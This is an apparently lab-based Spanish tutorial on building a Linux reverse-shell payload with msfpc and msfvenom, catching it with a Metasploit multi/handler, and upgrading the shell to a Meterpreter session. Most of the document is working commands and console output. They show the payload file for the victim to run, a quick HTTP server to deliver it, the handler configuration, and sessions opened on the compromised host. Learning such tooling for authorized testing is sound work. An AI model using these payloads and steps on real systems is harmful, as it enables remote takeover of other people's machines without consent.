====== Reverse shell with metaexploit ======
Jorge Pinilla López
2018/06/13
Vamos a crear un reverse shell y a usarlo mediante un payload, metaexploit y meterpreter
===== Creación de la payload =====
Para crear la payload usaremos mfsvenom, pero para simplificar se usará msfpc el cual es un wrapper que facilita la creación de payloads. (https://github.com/g0tmi1k/mpc)
Opciones por defecto:
*Port 443
*MSF
*REVERSE
*STAGELESS
*TCP
Ejemplo de uso:
./msfpc.sh Linux
[*] MSFvenom Payload Creator (MSFPC v1.4.4)
[i] Use which interface - IP address?:
[i] 1.) eth0 - 192.168.122.59
[i] 2.) eth1 - 192.168.200.10
[i] 3.) lo - 127.0.0.1
[i] 4.) wan - 83.42.174.42
[?] Select 1-4, interface or IP address: 2
[i] IP: 192.168.200.10
[i] PORT: 443
[i] TYPE: linux (linux/x86/shell/reverse_tcp)
[i] CMD: msfvenom -p linux/x86/shell/reverse_tcp -f elf \
--platform linux -a x86 -e generic/none LHOST=192.168.200.10 LPORT=443 \
> '/home/jorpilo/git/linux-shell-staged-reverse-tcp-443.elf'
[i] linux shell created: '/home/user/git/linux-shell-staged-reverse-tcp-443.elf'
[i] MSF handler file: '/home/user/git/linux-shell-staged-reverse-tcp-443-elf.rc'
[i] Run: msfconsole -q -r '/home/user/git/linux-shell-staged-reverse-tcp-443-elf.rc'
[?] Quick web server (for file transfer)?: python2 -m SimpleHTTPServer 8080
[*] Done!
Posibles payloads a generar:
*APK
*ASP
*ASPX
*Bash [.sh]
*Java [.jsp]
*Linux [.elf]
*OSX [.macho]
*Perl [.pl]
*PHP
*Powershell [.ps1]
*Python [.py]
*Tomcat [.war]
*Windows [.exe /.dll]
Esto genera dos archivos:
*linux-shell-staged-reverse-tcp-443.elf
Archivo que el atacado debe ejecutar
*linux-shell-staged-reverse-tcp-443-elf.rc
Payload para multi/handler de metaexploit
==== Trucos: ====
Generar un servidor de ficheros rapidos en el directorio
python2 -m SimpleHTTPServer 8080
Ejecutar metaexploit con todo configurado
#Copiado de la salida de msfpc
sudo msfconsole -q -r '/home/user/git/linux-shell-staged-reverse-tcp-443-elf.rc'
===== Creación del handler =====
Usando el codigo que genra msfpc
bash$> sudo msfconsole -q -r '/home/user/git/linux-shell-staged-reverse-tcp-443-elf.rc'
[*] Processing /home/user/git/linux-shell-staged-reverse-tcp-443-elf.rc for ERB directives.
resource (/home/user/git/linux-shell-staged-reverse-tcp-443-elf.rc)> use exploit/multi/handler
resource (/home/user/git/linux-shell-staged-reverse-tcp-443-elf.rc)> set PAYLOAD linux/x86/shell/reverse_tcp
PAYLOAD => linux/x86/shell/reverse_tcp
resource (/home/user/git/linux-shell-staged-reverse-tcp-443-elf.rc)> set LHOST 192.168.200.10
LHOST => 192.168.200.10
resource (/home/user/git/linux-shell-staged-reverse-tcp-443-elf.rc)> set LPORT 443
LPORT => 443
resource (/home/user/git/linux-shell-staged-reverse-tcp-443-elf.rc)> set ExitOnSession false
ExitOnSession => false
resource (/home/user/git/linux-shell-staged-reverse-tcp-443-elf.rc)> run -j
[*] Exploit running as background job 0.
[*] Started reverse TCP handler on 192.168.200.10:443
Esto configura el handler y lanza el trabajo en background 0
msf exploit(multi/handler) > threads
Background Threads
==================
ID Status Critical Name Started
-- ------ -------- ---- -------
0 sleep False JobID(0)-Exploit: multi/handler 2018-06-13 23:05:25 +0200
1 sleep True SessionScheduler-1 2018-06-13 23:05:25 +0200
2 sleep True SessionScheduler-2 2018-06-13 23:05:25 +0200
3 sleep True SessionScheduler-3 2018-06-13 23:05:25 +0200
4 sleep True SessionScheduler-4 2018-06-13 23:05:25 +0200
5 sleep True SessionScheduler-5 2018-06-13 23:05:25 +0200
6 sleep True SessionManager 2018-06-13 23:05:25 +0200
7 sleep False ReverseTcpHandlerListener-443 2018-06-13 23:05:25 +0200
8 sleep False ReverseTcpHandlerWorker-443 2018-06-13 23:05:25 +0200
Cuando el atacado abre el archivo genera una nueva sesion en metaexploit, para mostrar las sesiones:
msf exploit(multi/handler) >
[*] Sending stage (36 bytes) to 192.168.200.164
[*] Command shell session 1 opened (192.168.200.10:443 -> 192.168.200.164:42480) at 2018-06-13 23:08:29 +0200
msf exploit(multi/handler) > sessions -l
Active sessions
===============
Id Name Type Information Connection
-- ---- ---- ----------- ----------
1 shell x86/linux 192.168.200.10:443 -> 192.168.200.164:42480 (192.168.200.164)
Como podemo ver es una sesión de linux shell, para acceder a la sessión ejecutamos
msf exploit(multi/handler) > sessions -i 1
y tendremos un shell en la maquina atacada.
===== Meterpreter =====
Vamos a ir un paso más y vamos a transformar dicha sesión de shell en una sesión de meterpreter, para ello:
msf exploit(multi/handler) > use post/multi/manage/shell_to_meterpreter
msf post(multi/manage/shell_to_meterpreter) > set SESSION 1
SESSION => 1
msf post(multi/manage/shell_to_meterpreter) > run
[*] Upgrading session ID: 1
[*] Starting exploit/multi/handler
[*] Started reverse TCP handler on 192.168.200.10:4433
[*] Sending stage (853256 bytes) to 192.168.200.164
[*] Meterpreter session 2 opened (192.168.200.10:4433 -> 192.168.200.164:60144) at 2018-06-13 23:12:34 +0200
[*] Command stager progress: 100.00% (773/773 bytes)
[*] Post module execution completed
Si ahora vamos a sessions observamos las dos sesiones, podemos acceder a la session 2 de meterpreter:
msf post(multi/manage/shell_to_meterpreter) > sessions -l
Active sessions
===============
Id Name Type Information Connection
-- ---- ---- ----------- ----------
1 shell x86/linux 192.168.200.10:443 -> 192.168.200.164:42480 (192.168.200.164)
2 meterpreter x86/linux uid=1001, gid=1001, euid=1001, egid=1001 @ 192.168.200.164 192.168.200.10:4433 -> 192.168.200.164:60144 (192.168.200.164)
msf post(multi/manage/shell_to_meterpreter) > sessions -i 2
[*] Starting interaction with 2...
meterpreter >